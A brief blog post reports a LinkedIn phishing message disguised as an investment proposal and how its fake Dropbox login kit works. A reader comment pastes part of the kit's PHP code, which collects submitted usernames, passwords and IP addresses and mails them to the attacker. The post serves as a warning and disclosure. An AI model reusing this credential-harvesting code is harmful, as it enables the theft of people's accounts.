LinkedIn Phish – Investment Proposal

Today I received the following message from a LinkedIn contact:


I hope all is well with you, please review this recommendation for an investment opportunity which am considering a partnership with you if you’re interested. I hope that the reasons for this investment, which are alluded to in more details in the enclosed document( ), will make you consider this alliance positively.

I hope you you will reply soon. With best wishes,

Warm Regards,


I think this looked wierd, so I opened the site in a safe browser and explored a little. It turned out it was definitely a phish. The landing page looks thrustworthy:



The bad guys left a mistake though at . This zip file contains some simple scripts that sends all credentials submitted to the following email address: .The script then redirects you to this PDF:

I’ve sent an email to to notify them about this phish.

  • anonymous

    I just got a fresh one

    Same format, also left a zip file with source code behind.


    $ip = $_SERVER['REMOTE_ADDR'];

    $time = date("m-d-Y g:i:a");

    $msg =


    $msg .= "Dropbox Login Info by OluwaTyrulen";

    $msg .=


    $msg .= "Email : ".$_POST['username']."n";

    $msg .= "Password : ".$_POST['password']."n";

    $msg .=


    $msg .= "Sent from $ip on $timen";

    $msg .=


    $to = "";

    $subject = "Dropbox Update $ip";

    $from = "From: swinzu”;